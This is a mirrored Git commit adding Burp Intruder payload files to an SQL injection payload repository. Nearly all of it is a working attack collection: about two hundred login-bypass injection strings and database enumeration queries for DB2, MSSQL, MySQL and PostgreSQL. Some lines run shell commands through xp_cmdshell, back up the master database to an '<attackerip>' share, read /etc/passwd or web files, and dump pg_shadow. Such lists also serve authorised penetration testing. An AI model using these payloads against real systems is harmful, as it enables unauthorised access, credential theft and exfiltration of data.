mirror of
https://github.com/payloadbox/sql-injection-payload-list.git
synced 2025-12-29 16:15:05 +00:00
Intruder Payloads
Add Intruder Payloads
This commit is contained in:
İsmail Taşdelen
198
Intruder/exploit/Auth_Bypass.txt
Normal file
198
Intruder/exploit/Auth_Bypass.txt
Normal file
@@ -0,0 +1,198 @@
|
||||
'-'
|
||||
' '
|
||||
'&'
|
||||
'^'
|
||||
'*'
|
||||
' or ''-'
|
||||
' or '' '
|
||||
' or ''&'
|
||||
' or ''^'
|
||||
' or ''*'
|
||||
"-"
|
||||
" "
|
||||
"&"
|
||||
"^"
|
||||
"*"
|
||||
" or ""-"
|
||||
" or "" "
|
||||
" or ""&"
|
||||
" or ""^"
|
||||
" or ""*"
|
||||
or true--
|
||||
" or true--
|
||||
' or true--
|
||||
") or true--
|
||||
') or true--
|
||||
' or 'x'='x
|
||||
') or ('x')=('x
|
||||
')) or (('x'))=(('x
|
||||
" or "x"="x
|
||||
") or ("x")=("x
|
||||
")) or (("x"))=(("x
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1#
|
||||
or 1=1/*
|
||||
admin' --
|
||||
admin' #
|
||||
admin'/*
|
||||
admin' or '1'='1
|
||||
admin' or '1'='1'--
|
||||
admin' or '1'='1'#
|
||||
admin' or '1'='1'/*
|
||||
admin'or 1=1 or ''='
|
||||
admin' or 1=1
|
||||
admin' or 1=1--
|
||||
admin' or 1=1#
|
||||
admin' or 1=1/*
|
||||
admin') or ('1'='1
|
||||
admin') or ('1'='1'--
|
||||
admin') or ('1'='1'#
|
||||
admin') or ('1'='1'/*
|
||||
admin') or '1'='1
|
||||
admin') or '1'='1'--
|
||||
admin') or '1'='1'#
|
||||
admin') or '1'='1'/*
|
||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
admin" --
|
||||
admin" #
|
||||
admin"/*
|
||||
admin" or "1"="1
|
||||
admin" or "1"="1"--
|
||||
admin" or "1"="1"#
|
||||
admin" or "1"="1"/*
|
||||
admin"or 1=1 or ""="
|
||||
admin" or 1=1
|
||||
admin" or 1=1--
|
||||
admin" or 1=1#
|
||||
admin" or 1=1/*
|
||||
admin") or ("1"="1
|
||||
admin") or ("1"="1"--
|
||||
admin") or ("1"="1"#
|
||||
admin") or ("1"="1"/*
|
||||
admin") or "1"="1
|
||||
admin") or "1"="1"--
|
||||
admin") or "1"="1"#
|
||||
admin") or "1"="1"/*
|
||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
==
|
||||
=
|
||||
'
|
||||
' --
|
||||
' #
|
||||
' –
|
||||
'--
|
||||
'/*
|
||||
'#
|
||||
" --
|
||||
" #
|
||||
"/*
|
||||
' and 1='1
|
||||
' and a='a
|
||||
or 1=1
|
||||
or true
|
||||
' or ''='
|
||||
" or ""="
|
||||
1′) and '1′='1–
|
||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
and 1=1
|
||||
and 1=1–
|
||||
' and 'one'='one
|
||||
' and 'one'='one–
|
||||
' group by password having 1=1--
|
||||
' group by userid having 1=1--
|
||||
' group by username having 1=1--
|
||||
like '%'
|
||||
or 0=0 --
|
||||
or 0=0 #
|
||||
or 0=0 –
|
||||
' or 0=0 #
|
||||
' or 0=0 --
|
||||
' or 0=0 #
|
||||
' or 0=0 –
|
||||
" or 0=0 --
|
||||
" or 0=0 #
|
||||
" or 0=0 –
|
||||
%' or '0'='0
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1/*
|
||||
or 1=1#
|
||||
or 1=1–
|
||||
' or 1=1--
|
||||
' or '1'='1
|
||||
' or '1'='1'--
|
||||
' or '1'='1'/*
|
||||
' or '1'='1'#
|
||||
' or '1′='1
|
||||
' or 1=1
|
||||
' or 1=1 --
|
||||
' or 1=1 –
|
||||
' or 1=1--
|
||||
' or 1=1;#
|
||||
' or 1=1/*
|
||||
' or 1=1#
|
||||
' or 1=1–
|
||||
') or '1'='1
|
||||
') or '1'='1--
|
||||
') or '1'='1'--
|
||||
') or '1'='1'/*
|
||||
') or '1'='1'#
|
||||
') or ('1'='1
|
||||
') or ('1'='1--
|
||||
') or ('1'='1'--
|
||||
') or ('1'='1'/*
|
||||
') or ('1'='1'#
|
||||
'or'1=1
|
||||
'or'1=1′
|
||||
" or "1"="1
|
||||
" or "1"="1"--
|
||||
" or "1"="1"/*
|
||||
" or "1"="1"#
|
||||
" or 1=1
|
||||
" or 1=1 --
|
||||
" or 1=1 –
|
||||
" or 1=1--
|
||||
" or 1=1/*
|
||||
" or 1=1#
|
||||
" or 1=1–
|
||||
") or "1"="1
|
||||
") or "1"="1"--
|
||||
") or "1"="1"/*
|
||||
") or "1"="1"#
|
||||
") or ("1"="1
|
||||
") or ("1"="1"--
|
||||
") or ("1"="1"/*
|
||||
") or ("1"="1"#
|
||||
) or '1′='1–
|
||||
) or ('1′='1–
|
||||
' or 1=1 LIMIT 1;#
|
||||
'or 1=1 or ''='
|
||||
"or 1=1 or ""="
|
||||
' or 'a'='a
|
||||
' or a=a--
|
||||
' or a=a–
|
||||
') or ('a'='a
|
||||
" or "a"="a
|
||||
") or ("a"="a
|
||||
') or ('a'='a and hi") or ("a"="a
|
||||
' or 'one'='one
|
||||
' or 'one'='one–
|
||||
' or uid like '%
|
||||
' or uname like '%
|
||||
' or userid like '%
|
||||
' or user like '%
|
||||
' or username like '%
|
||||
' or 'x'='x
|
||||
') or ('x'='x
|
||||
" or "x"="x
|
||||
' OR 'x'='x'#;
|
||||
'=' 'or' and '=' 'or'
|
||||
' UNION ALL SELECT 1, @@version;#
|
||||
' UNION ALL SELECT system_user(),user();#
|
||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
||||
admin' and substring(password/text(),1,1)='7
|
||||
' and substring(password/text(),1,1)='7
|
||||
' or 1=1 limit 1 -- -+
|
||||
'="or'
|
||||
12
Intruder/exploit/DB2/db2-enumeration.txt
Normal file
12
Intruder/exploit/DB2/db2-enumeration.txt
Normal file
@@ -0,0 +1,12 @@
|
||||
select versionnumber, version_timestamp from sysibm.sysversions;
|
||||
select user from sysibm.sysdummy1;
|
||||
select session_user from sysibm.sysdummy1;
|
||||
select system_user from sysibm.sysdummy1;
|
||||
select current server from sysibm.sysdummy1;
|
||||
select name from sysibm.systables;
|
||||
select grantee from syscat.dbauth;
|
||||
select * from syscat.tabauth;
|
||||
select * from syscat.dbauth where grantee = current user;
|
||||
select * from syscat.tabauth where grantee = current user;
|
||||
select name, tbname, coltype from sysibm.syscolumns;
|
||||
SELECT schemaname FROM syscat.schemata;
|
||||
11
Intruder/exploit/MSSQL/ms-sql-enumeration.txt
Normal file
11
Intruder/exploit/MSSQL/ms-sql-enumeration.txt
Normal file
@@ -0,0 +1,11 @@
|
||||
select @@version
|
||||
select @@servernamee
|
||||
select @@microsoftversione
|
||||
select * from master..sysserverse
|
||||
select * from sysusers
|
||||
exec master..xp_cmdshell 'ipconfig+/all'
|
||||
exec master..xp_cmdshell 'net+view'
|
||||
exec master..xp_cmdshell 'net+users'
|
||||
exec master..xp_cmdshell 'ping+<attackerip>'
|
||||
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
|
||||
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--
|
||||
5
Intruder/exploit/MySQL/mysql-injection-login-bypass.txt
Normal file
5
Intruder/exploit/MySQL/mysql-injection-login-bypass.txt
Normal file
@@ -0,0 +1,5 @@
|
||||
<username>' OR 1=1--
|
||||
'OR '' = ' Allows authentication without a valid username.
|
||||
<username>'--
|
||||
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
|
||||
'OR 1=1--
|
||||
1
Intruder/exploit/MySQL/mysql-read-local-files.txt
Normal file
1
Intruder/exploit/MySQL/mysql-read-local-files.txt
Normal file
@@ -0,0 +1 @@
|
||||
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|
||||
19
Intruder/exploit/PostgresSQL/postgres-enumeration.txt
Normal file
19
Intruder/exploit/PostgresSQL/postgres-enumeration.txt
Normal file
@@ -0,0 +1,19 @@
|
||||
select version();
|
||||
select current_database();
|
||||
select current_user;
|
||||
select session_user;
|
||||
select current_setting('log_connections');
|
||||
select current_setting('log_statement');
|
||||
select current_setting('port');
|
||||
select current_setting('password_encryption');
|
||||
select current_setting('krb_server_keyfile');
|
||||
select current_setting('virtual_host');
|
||||
select current_setting('port');
|
||||
select current_setting('config_file');
|
||||
select current_setting('hba_file');
|
||||
select current_setting('data_directory');
|
||||
select * from pg_shadow;
|
||||
select * from pg_group;
|
||||
create table myfile (input TEXT);
|
||||
copy myfile from '/etc/passwd';
|
||||
select * from myfile;copy myfile to /tmp/test;
|
||||
Reference in New Issue
Block a user